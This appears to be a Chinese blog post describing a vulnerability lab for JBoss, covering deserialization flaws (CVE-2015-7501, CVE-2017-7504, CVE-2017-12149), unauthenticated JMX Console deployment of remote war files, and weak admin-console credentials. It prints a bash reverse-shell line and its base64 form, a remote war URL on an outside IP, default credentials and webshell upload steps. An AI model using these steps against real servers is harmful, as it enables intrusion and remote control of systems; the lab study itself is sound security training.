当前位置: 首页 > article >正文

常见中间件漏洞(Jboss)靶场

1.CVE-2015-7501

开启环境查看端口

http://192.168.10.194:8080/ invoker/JMXInvokerServlet 说明接⼝开放,此接⼝存在反序列化漏洞

下载 ysoserial ⼯具进⾏漏洞利⽤
https://github.com/frohoff/ysoserial
将反弹shell进⾏base64编码
bash -i >& /dev/tcp/192.168.10.194/6666 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA=

2.CVE-2017-7504

开启环境查看端口

访问http://192.168.10.194:8080/jbossmq-httpil/HTTPServerILServlet

python3 jexboss.py -u http://192.168.10.194:8080

3.低版本JMX Console未授权

访问:http://192.168.10.194:8080/jmx-console/

找到这个

找到⻚⾯中的void addURL() 选项远程加载war包来部署。
制作war包 , 这⾥⽤之前制作好的 cmd.war
填写war包远程地址
http://47.121.212.229/sxy.war
http://192.168.10.194:8080/sxy/1.jsp
连接

4.CVE-2017-12149

开启环境

访问http://192.168.10.194:8080/invoker/readonly验证是否存在漏洞

返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞
利用工具检测如果成功直接上传webshell即可

5.Administration Console弱⼝令

http://192.168.10.194:8080/admin-console/login.seam

密码⽂件
/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties
账户密码:admin:vulhub
登录 后台
上传shell.war
连接webshell

6.⾼版本JMX Console未授权

http://192.168.10.194:8080/jmx-console/

因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub
进来点击
找到
搭建远程部署 , 部署远程war包地址
点击I nvoke
连接Webshell

http://www.kler.cn/a/315083.html

相关文章:

  • python制作一个简单的端口扫描器,用于检测目标主机上指定端口的开放状态
  • 将Excel文件的两个表格经过验证后分别读取到Excel表和数据库
  • 基于非时空的离身与反身智能
  • 【C#设计模式(8)——过滤器模式(Adapter Pattern)】
  • 一文详解java的数据类型
  • 使用HTML、CSS和JavaScript创建动态圣诞树
  • PyTorch 目标检测教程
  • 图神经网络的新篇章:通用、强大、可扩展的图变换器
  • 容器技术--Dockerfile 构建镜像
  • 加密与安全_优雅存储二要素(AES-256-GCM )
  • 从 Affine Particle-In-Cell (APIC) 到 Material Point Method (MPM 物质点法)
  • LLM应用实战: 文档问答系统Kotaemon-1. 简介及部署实践
  • 手机游戏怎么防护攻击?市面游戏盾如何选择?
  • Hive安装教程
  • C#学习系列之Gmap地图界面上的实时绘制问题
  • 华为HarmonyOS地图服务 6 - 侦听事件来实现地图交互
  • C++中的new和delete及其重载
  • JMeter全流程性能测试实战!
  • 第十二周:机器学习
  • iPhone16,超先进摄像头系统?丝滑的相机控制
  • 说说 RESTful API,以及如何使用它构建 web 应用程序。
  • 【6DRepNet360全范围头部姿态估计onnxruntime推理】
  • Spring Boot RESTful 风格四大请求编码模板(GET、POST、PUT、DELETE)
  • 分布式事务详细笔记:什么是分布式事务--Seata--XA模式--AT模式
  • 分享课程:云LAN到家视频教程
  • 【数据结构】排序算法---归并排序